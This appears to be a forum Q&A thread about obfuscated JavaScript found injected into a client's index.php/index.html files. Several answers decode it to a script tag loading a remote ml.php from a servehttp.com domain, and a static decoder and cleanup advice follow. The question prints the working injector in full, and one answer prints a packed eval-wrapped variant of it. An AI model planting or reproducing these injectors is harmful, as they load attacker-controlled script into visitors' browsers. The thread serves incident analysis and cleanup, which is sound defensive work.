Tutorial: Obscure JavaScript code in index.php/index.html files



Question:

Maybe someone here can help or explain what happened. I just noticed today that on one of my client's sites all index.php / index.html files got replaced and some obscure JavaScript code was added. The code is below:

<script type="text/javascript">
var nhZE2uSD="Ow8xN18Ow8xN31";
var usW1446O0="Ow8xN3cOw8xN73Ow8xN63Ow8xN72";
var usW1446O1="Ow8xN69Ow8xN70Ow8xN74Ow8xN20";
var usW1446O2="Ow8xN74Ow8xN79Ow8xN70Ow8xN65";
var usW1446O3="Ow8xN3dOw8xN22Ow8xN74Ow8xN65";
var usW1446O4="Ow8xN78Ow8xN74Ow8xN2fOw8xN6a";
var usW1446O5="Ow8xN61Ow8xN76Ow8xN61Ow8xN73";
var usW1446O6="Ow8xN63Ow8xN72Ow8xN69Ow8xN70";
var usW1446O7="Ow8xN74Ow8xN22Ow8xN20Ow8xN73";
var usW1446O8="Ow8xN72Ow8xN63Ow8xN3dOw8xN22";
var usW1446O9="Ow8xN68Ow8xN74Ow8xN74Ow8xN70";
var usW1446O10="Ow8xN3aOw8xN2fOw8xN2fOw8xN61";
var usW1446O11="Ow8xN6eOw8xN6eOw8xN6fOw8xN75";
var usW1446O12="Ow8xN2eOw8xN73Ow8xN65Ow8xN72";
var usW1446O13="Ow8xN76Ow8xN65Ow8xN68Ow8xN74";
var usW1446O14="Ow8xN74Ow8xN70Ow8xN2eOw8xN63";
var usW1446O15="Ow8xN6fOw8xN6dOw8xN2fOw8xN2f";
var usW1446O16="Ow8xN6dOw8xN6cOw8xN2eOw8xN70";
var usW1446O17="Ow8xN68Ow8xN70Ow8xN22Ow8xN3e";
var usW1446O18="Ow8xN20Ow8xN3cOw8xN2fOw8xN73";
var usW1446O19="Ow8xN63Ow8xN72Ow8xN69Ow8xN70";
var usW1446O20="Ow8xN74Ow8xN3e";
var JgUg10US="g4Uuq18Ow8xN31";
var Q8NVsUq5=usW1446O0+usW1446O1+usW1446O2+usW1446O3+usW1446O4+usW1446O5+usW1446O6+usW1446O7+usW1446O8+usW1446O9+usW1446O10+usW1446O11+usW1446O12+usW1446O13+usW1446O14+usW1446O15+usW1446O16+usW1446O17+usW1446O18+usW1446O19+usW1446O20;
CvhvkAeR=Q8NVsUq5.replace(/Ow8xN/g,"%");
var KcQGBJKD=unescape;
var nhZE2uSD="cZLH618g4Uuq31";
q9124=this;
var WrEGuKeo=q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")];
WrEGuKeo.write(KcQGBJKD(CvhvkAeR));
</script>

Can someone explain to me what the code does?

Thanks for any help.


Solution:1

Looks like the site has been compromised. Based on the PHP tag, I would suggest you use HTML Purifier or OWASP to make things a lot more secure.

You must disable the eval construct and the allow_url_fopen setting in php.ini.

Analyze the server settings for any security holes with:

PHPSecInfo


Solution:2

It's malware. It injects:

<script type="text/javascript" src="http://annou.servehttp.com//ml.php"> </script>  

Needless to say, I don't recommend visiting that domain.

Most of the script is variable assignments for obfuscation. If you execute everything but the last line (this part doesn't use any unknown functions), you can then print WrEGuKeo (document) and KcQGBJKD(CvhvkAeR) (the above string). KcQGBJKD is just unescape.


Solution:3

It's not very well obfuscated, so just run through it line by line in your head:

/* ignore this for now, we'll get to it later
var nhZE2uSD="Ow8xN18Ow8xN31";
var usW1446O0="Ow8xN3cOw8xN73Ow8xN63Ow8xN72";
...
var usW1446O20="Ow8xN74Ow8xN3e";
var JgUg10US="g4Uuq18Ow8xN31";
*/

var Q8NVsUq5=usW1446O0+usW1446O1+us... // this just concatenates the above

/* this takes the above "gibberish" and turns it into URL-encoding, e.g.:
 * 'Hello%20World' = 'Hello World'
 */
CvhvkAeR=Q8NVsUq5.replace(/Ow8xN/g,"%"); // replace 'Ow8xN' with '%'

/* give unescape() an alias */
var KcQGBJKD=unescape;

var nhZE2uSD="cZLH618g4Uuq31"; // this is pointless so far as I can tell

/* assign window to q9124 */
q9124=this;

/* WrEGuKeo = window[$something]
 * to get the value of $something, remove all occurrences of Y,1,2,W,l,G,:
 * from the gibberish to get: 'document'
 * so this line actually reads:
 * var WrEGuKeo = window["document"];
 */
var WrEGuKeo=q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")];

/*
 * document.write(unescape($ourUrlEncodedStringAbove));
 */
WrEGuKeo.write(KcQGBJKD(CvhvkAeR));

I'd leave deciphering the URL-encoded string to you, but Matthew already gave it away.

Edit: I didn't want to go into the URL-encoding too deeply because it's a pretty simple process but takes up a lot of room. But check out the Wikipedia article if you need more info.
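Solution 2 and Solution 3 both decode the payload by hand (concatenate the chunks, turn the filler token into "%", percent-decode, strip the filler letters from the property name). The following is an added example that does the same thing statically, treating the injected script as text so nothing in it is ever executed; it is not code from the question or from any of the answers. SAMPLE is the script from the question with the extraction whitespace removed; every function name in it is this example's own.

```javascript
// Added example, not code from the question or the answers: a static decoder
// for this injection. It reads the injected script as text and never
// executes it, reproducing the steps the answers describe by hand:
// concatenate the chunk variables, swap the filler token for "%",
// percent-decode, and strip the filler characters from the obfuscated
// property name. SAMPLE is the script from the question (extraction
// whitespace removed); every function name below is this example's own.
const SAMPLE = `
var nhZE2uSD="Ow8xN18Ow8xN31";
var usW1446O0="Ow8xN3cOw8xN73Ow8xN63Ow8xN72"; var usW1446O1="Ow8xN69Ow8xN70Ow8xN74Ow8xN20";
var usW1446O2="Ow8xN74Ow8xN79Ow8xN70Ow8xN65"; var usW1446O3="Ow8xN3dOw8xN22Ow8xN74Ow8xN65";
var usW1446O4="Ow8xN78Ow8xN74Ow8xN2fOw8xN6a"; var usW1446O5="Ow8xN61Ow8xN76Ow8xN61Ow8xN73";
var usW1446O6="Ow8xN63Ow8xN72Ow8xN69Ow8xN70"; var usW1446O7="Ow8xN74Ow8xN22Ow8xN20Ow8xN73";
var usW1446O8="Ow8xN72Ow8xN63Ow8xN3dOw8xN22"; var usW1446O9="Ow8xN68Ow8xN74Ow8xN74Ow8xN70";
var usW1446O10="Ow8xN3aOw8xN2fOw8xN2fOw8xN61"; var usW1446O11="Ow8xN6eOw8xN6eOw8xN6fOw8xN75";
var usW1446O12="Ow8xN2eOw8xN73Ow8xN65Ow8xN72"; var usW1446O13="Ow8xN76Ow8xN65Ow8xN68Ow8xN74";
var usW1446O14="Ow8xN74Ow8xN70Ow8xN2eOw8xN63"; var usW1446O15="Ow8xN6fOw8xN6dOw8xN2fOw8xN2f";
var usW1446O16="Ow8xN6dOw8xN6cOw8xN2eOw8xN70"; var usW1446O17="Ow8xN68Ow8xN70Ow8xN22Ow8xN3e";
var usW1446O18="Ow8xN20Ow8xN3cOw8xN2fOw8xN73"; var usW1446O19="Ow8xN63Ow8xN72Ow8xN69Ow8xN70";
var usW1446O20="Ow8xN74Ow8xN3e";
var JgUg10US="g4Uuq18Ow8xN31";
var Q8NVsUq5=usW1446O0+usW1446O1+usW1446O2+usW1446O3+usW1446O4+usW1446O5+usW1446O6+usW1446O7+usW1446O8+usW1446O9+usW1446O10+usW1446O11+usW1446O12+usW1446O13+usW1446O14+usW1446O15+usW1446O16+usW1446O17+usW1446O18+usW1446O19+usW1446O20;
CvhvkAeR=Q8NVsUq5.replace(/Ow8xN/g,"%");
var KcQGBJKD=unescape;
var nhZE2uSD="cZLH618g4Uuq31";
q9124=this;
var WrEGuKeo=q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\\:]/g, "")];
WrEGuKeo.write(KcQGBJKD(CvhvkAeR));
`;

// Equivalent of the deprecated unescape() for %XX (and %uXXXX) sequences.
function percentDecode(s) {
  return s
    .replace(/%u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Every `var name="literal"` in the script; a later assignment wins, as in JS.
function collectStringVars(src) {
  const vars = new Map();
  const re = /var\s+([A-Za-z_$][\w$]*)\s*=\s*"([^"]*)"/g;
  for (const m of src.matchAll(re)) vars.set(m[1], m[2]);
  return vars;
}

// The first `a+b+c+...` chain of identifiers, resolved against the literals.
function resolveConcatenation(src, vars) {
  const m = /=\s*((?:[\w$]+\s*\+\s*){2,}[\w$]+)\s*;/.exec(src);
  if (!m) throw new Error("no concatenation chain found");
  return m[1].split("+").map((v) => {
    const name = v.trim();
    if (!vars.has(name)) throw new Error("unknown variable " + name);
    return vars.get(name);
  }).join("");
}

// The filler token that `.replace(/TOKEN/g,"%")` turns into a percent sign.
function findPercentToken(src) {
  const m = /\.replace\(\/([^\/]+)\/g\s*,\s*"%"\)/.exec(src);
  if (!m) throw new Error("no percent-token replace found");
  return m[1];
}

// `obj["gibberish".replace(/[chars]/g,"")]` -> the real property name.
function resolvePropertyName(src) {
  const m = /\["([^"]+)"\.replace\(\/\[([^\]]+)\]\/g\s*,\s*""\)\]/.exec(src);
  if (!m) return null;
  return m[1].replace(new RegExp("[" + m[2] + "]", "g"), "");
}

// Full static decode: the sink property, the decoded payload, and the
// remote URL it would load, for triage and blocklisting.
function decodeInjection(src) {
  const vars = collectStringVars(src);
  const token = findPercentToken(src);
  const encoded = resolveConcatenation(src, vars).split(token).join("%");
  const payload = percentDecode(encoded);
  const srcMatch = /src\s*=\s*"([^"]+)"/i.exec(payload);
  return {
    sink: resolvePropertyName(src),
    payload: payload,
    remoteUrl: srcMatch ? srcMatch[1] : null,
  };
}

console.log(decodeInjection(SAMPLE));
```

Because the decoder only pattern-matches the source, it can be run on the infected files from a shell on the server or on a copy pulled down over FTP, with no browser and no risk of fetching ml.php. The three regexes are tied to this particular family (quoted chunk variables, a single `.replace(/TOKEN/g,"%")`, a stripped property name), so on a different packer they will throw rather than guess.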


Solution:4

It's probably best that you don't run it, as it looks like someone has tried to insert malicious code into your site.

Change your FTP password immediately, and if you're using a common script such as phpBB, WordPress etc., make sure you have the latest updates to the scripts.


Solution:5

Doesn't look good. The site has most likely been compromised (cross-site scripting?)


Solution:6

Could be malicious code. Make sure there has been no unauthorised access to your FTP etc.; it's probably best to go and change all your usernames/passwords, virus scan your computer, and restore an old backup of the site.

It shouldn't just change on its own; someone did it. Here is the injected code beautified:

eval(function (p, a, c, k, e, d) {
    /* standard p,a,c,k,e,d unpacker (Dean Edwards' /packer/ output); the
     * comparison operators in e() were lost when the page was extracted
     * and are restored here from the canonical unpacker */
    e = function (c) {
        return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
        while (c--) {
            d[e(c)] = k[c] || e(c)
        }
        k = [function (e) {
            return d[e]
        }];
        e = function () {
            return '\\w+'
        };
        c = 1
    };
    while (c--) {
        if (k[c]) {
            p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
        }
    }
    return p
}('0 A="X";0 j="W";0 i="V";0 h="U";0 e="Y";0 f="T";0 k="13";0 r="12";0 p="11";0 o="10";0 n="14";0 d="P";0 q="J";0 c="K";0 4="I";0 3="L";0 2="S";0 1="M";0 5="R";0 6="Q";0 b="N";0 a="O";0 9="Z";0 7="1q";0 8="1k";0 m="1j";0 x="1i";0 H="1h";0 F="1l";0 D="1m";0 C="1p";0 E="15";0 G="1o";0 B="1n";0 z="1g";0 u="1f";0 19="18";0 t=j+i+h+e+f+k+r+p+o+n+d+q+c+4+3+2+1+5+6+b+a+9+7+8+m+x+H+F+D+C+E+G+B+z+u;l=t.v(/1c/g,"%");0 y=1d;0 A="1e";s=1b;0 w=s["1a".v(/[16\\:]/g,"")];w.17(y(l));', 62, 89, 'var|Qn4KGrEEJXY216|Qn4KGrEEJXY215|Qn4KGrEEJXY214|Qn4KGrEEJXY213|Qn4KGrEEJXY217|Qn4KGrEEJXY218|Qn4KGrEEJXY222|Qn4KGrEEJXY223|Qn4KGrEEJXY221|Qn4KGrEEJXY220|Qn4KGrEEJXY219|Qn4KGrEEJXY212|Qn4KGrEEJXY210|Qn4KGrEEJXY23|Qn4KGrEEJXY24||Qn4KGrEEJXY22|Qn4KGrEEJXY21|Qn4KGrEEJXY20|Qn4KGrEEJXY25|Sdo7QoQybTJs|Qn4KGrEEJXY224|Qn4KGrEEJXY29|Qn4KGrEEJXY28|Qn4KGrEEJXY27|Qn4KGrEEJXY211|Qn4KGrEEJXY26|q9124|ThAyIvzqbEQQ|Qn4KGrEEJXY234|replace|WNWOcwoyad61|Qn4KGrEEJXY225|pX8f6fgPNrOg|Qn4KGrEEJXY233|HYipCnqdJpgI|Qn4KGrEEJXY232|Qn4KGrEEJXY229|Qn4KGrEEJXY228|Qn4KGrEEJXY230|Qn4KGrEEJXY227|Qn4KGrEEJXY231|Qn4KGrEEJXY226|dOUp4s2fOUp4s74OUp4s72|s74OUp4s74OUp4s70OUp4s|2eOUp4s63OUp4s6fOUp4s6|OUp4s66OUp4s2fOUp4s67O|p4s68OUp4s70OUp4s3fOUp|20OUp4s77OUp4s69OUp4s6|4OUp4s74OUp4s68OUp4s3d|4s76OUp4s65OUp4s68OUp4|s3dOUp4s31OUp4s22OUp4s|4s73OUp4s69OUp4s64OUp4|Up4s6fOUp4s2eOUp4s70OU|s22OUp4s68OUp4s74OUp4s|p4s65OUp4s20OUp4s73OUp|Up4s72OUp4s61OUp4s6dOU|OUp4s3cOUp4s69OUp4s66O|OUp4s17OUp4s34|4s72OUp4s63OUp4s3dOUp4|OUp4s22OUp4s31OUp4s30O|Up4s65OUp4s6dOUp4s2eOU|OUp4s79OUp4s73OUp4s74O|fOUp4s2fOUp4s65OUp4s73|74OUp4s70OUp4s3aOUp4s2|p4s73OUp4s65OUp4s72OUp|p4s3dOUp4s22OUp4s30OUp|Y12WlG|write|VzJjJ17OUp4s34|BbdzeevMKHSt|WYd1GoGYc2uG1mYGe2YnltY|this|OUp4s|unescape|CuPm017VzJjJ34|5OUp4s3e|72OUp4s61OUp4s6dOUp4s6|22OUp4s20OUp4s66OUp4s7|s22OUp4s31OUp4s30OUp4s|4s68OUp4s74OUp4s3dOUp4|p4s65OUp4s69OUp4s67OUp|2OUp4s61OUp4s6dOUp4s65|OUp4s62OUp4s6fOUp4s72O|s2fOUp4s69OUp4s66OUp4s|4s22OUp4s3eOUp4s3cOUp4|Up4s64OUp4s65OUp4s72OU|Up4s22OUp4s20OUp4s68OU'.split('|'), 0, {}))


Solution:7

Here is the deobfuscated JavaScript code:

<script type="text/javascript" src="http://annou.servehttp.com//ml.php"> </script>  
